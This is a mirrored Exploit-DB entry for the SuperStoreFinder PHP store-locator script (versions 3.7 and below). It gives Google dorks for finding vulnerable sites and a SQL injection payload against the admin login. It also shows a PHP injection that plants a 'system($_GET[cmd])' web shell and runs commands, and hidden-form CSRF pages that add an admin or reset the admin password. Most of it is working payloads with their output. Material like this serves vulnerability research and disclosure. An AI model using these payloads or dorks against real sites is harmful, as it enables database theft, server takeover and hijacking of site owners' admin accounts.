bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51822.txt
Exploit-DB c1bcfc6347 DB: 2024-02-28 
13 changes to exploits/shellcodes/ghdb

TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution
TEM Opera Plus FM Family Transmitter 35.45 - XSRF

Executables Created with perl2exe < V30.10C - Arbitrary Code Execution

Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit)
Automatic-Systems SOC FL9600 FastLine - Directory Transversal
Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin

dawa-pharma 1.0-2022 - Multiple-SQLi
Moodle 4.3 - Insecure Direct Object Reference
Moodle 4.3 - Reflected XSS

SuperStoreFinder - Multiple Vulnerabilities

Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)

Zoo Management System 1.0 - Unauthenticated RCE
2024-02-28 00:16:32 +00:00

131 lines
No EOL
5.9 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities
.:. Google Dorks .:.
"designed and built by Joe Iz."
"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."
inurl:/superstorefinder/index.php
.:. Date: 0ctober 13, 2023
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.superstorefinder.net/
.:. Product -> https://codecanyon.net/item/super-store-finder/3630922
.:. Product Version -> [3.7 and below]
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
Test #1
http://localhost:9000/adminstorefinder/admin/index.php
username=a'&password=1&btn_login=Login
Response Error:
Array
(
[0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1
)
SELECT users.* FROM users WHERE users.username='admin''
===========================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/adminstorefinder/admin/index.php
username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
&password=1&btn_login=Login
Response Error:
Array
(
[0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
)
===========================================================================================
======================================================================================================================================================================================
Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion
File: localhost/admin/settings.php
Vul Parameter: language_set [POST]
Proof of concept:
http://localhost:9000/superstorefinder/admin/settings.php
langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1
Index.php included in the config.inc.php , we just can go for rce
with GET parameter ?cmd=
http://localhost:9000/?cmd=uname -a
Reponse:
22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64
===========================================================================================
===========================================================================================
Vulnerability 3: Cross Site Request Forgery
Risk: It can lead to Privilege Escalation through adding admins or changing admin password.
Affected Files (1): localhost/superstorefinder/admin/users_add.php
Parameters: username,password,cpassword
Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input name="submit_hidden" value="submit_hidden" type="hidden" />
<input type='hidden' name='username' value='X'>
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' value='submit'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
Affected Files (2:):localhost/superstorefinder/admin/change_password.php
Parameters: password,cpassword,save
Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' name="save=" value='save'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
======================================================================================
Reference in a new issue View git blame Copy permalink